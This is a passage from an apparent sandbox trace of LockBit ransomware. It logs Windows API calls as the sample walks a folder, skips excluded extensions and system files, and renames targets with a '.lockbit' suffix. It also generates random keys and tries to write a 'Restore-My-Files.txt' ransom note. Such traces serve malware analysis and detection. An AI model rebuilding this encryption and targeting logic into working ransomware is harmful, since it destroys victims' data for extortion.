(lpString1=".qry", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.934] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.934] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF.lockbit") returned 72 [0162.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01682_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.936] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.936] malloc (_Size=0x40068) returned 0x3df0008 [0162.936] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3208) returned 1 [0162.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.937] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.003] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.003] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.005] free (_Block=0x1fa2ed8) [0163.005] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.005] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.005] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65da4900, ftCreationTime.dwHighDateTime=0x1bd4bda, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65da4900, ftLastWriteTime.dwHighDateTime=0x1bd4bda, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01701_.WMF", cAlternateFileName="")) returned 1 [0163.005] lstrcmpiW (lpString1=".", lpString2="NA01701_.WMF") returned -1 [0163.005] lstrcmpiW (lpString1="..", lpString2="NA01701_.WMF") returned -1 [0163.005] PathFindExtensionW (pszPath="NA01701_.WMF") returned=".WMF" [0163.005] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.005] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.006] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01701_.WMF") returned 1 [0163.007] lstrcmpiW (lpString1="ntldr", lpString2="NA01701_.WMF") returned 1 [0163.007] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01701_.WMF") returned 1 [0163.007] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01701_.WMF") returned -1 [0163.007] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01701_.WMF") returned -1 [0163.007] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01701_.WMF") returned 1 [0163.007] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01701_.WMF") returned -1 [0163.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF") returned=".WMF" [0163.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.007] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.008] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.008] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF.lockbit") returned 72 [0163.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01701_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0163.012] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.012] malloc (_Size=0x40068) returned 0x1ff1e60 [0163.012] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5316) returned 1 [0163.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0163.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0163.013] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.016] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.016] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.016] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.018] free (_Block=0x1fa2ed8) [0163.018] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.018] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.018] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.018] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01848_.WMF", cAlternateFileName="")) returned 1 [0163.018] lstrcmpiW (lpString1=".", lpString2="NA01848_.WMF") returned -1 [0163.018] lstrcmpiW (lpString1="..", lpString2="NA01848_.WMF") returned -1 [0163.018] PathFindExtensionW (pszPath="NA01848_.WMF") returned=".WMF" [0163.018] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.018] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.019] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.019] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01848_.WMF") returned 1 [0163.020] lstrcmpiW (lpString1="ntldr", lpString2="NA01848_.WMF") returned 1 [0163.020] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01848_.WMF") returned 1 [0163.020] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01848_.WMF") returned -1 [0163.020] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01848_.WMF") returned -1 [0163.020] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01848_.WMF") returned 1 [0163.020] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01848_.WMF") returned -1 [0163.020] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.020] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF") returned=".WMF" [0163.020] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.020] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.020] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.021] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.021] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF.lockbit") returned 72 [0163.021] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01848_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0163.022] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.022] malloc (_Size=0x40068) returned 0x3d70450 [0163.022] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1120) returned 1 [0163.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.023] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0163.023] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.023] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0163.023] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.029] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.029] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.029] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.030] free (_Block=0x1fa2ed8) [0163.030] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.030] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.030] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.030] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x270, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01849_.WMF", cAlternateFileName="")) returned 1 [0163.031] lstrcmpiW (lpString1=".", lpString2="NA01849_.WMF") returned -1 [0163.031] lstrcmpiW (lpString1="..", lpString2="NA01849_.WMF") returned -1 [0163.031] PathFindExtensionW (pszPath="NA01849_.WMF") returned=".WMF" [0163.031] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.031] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.032] 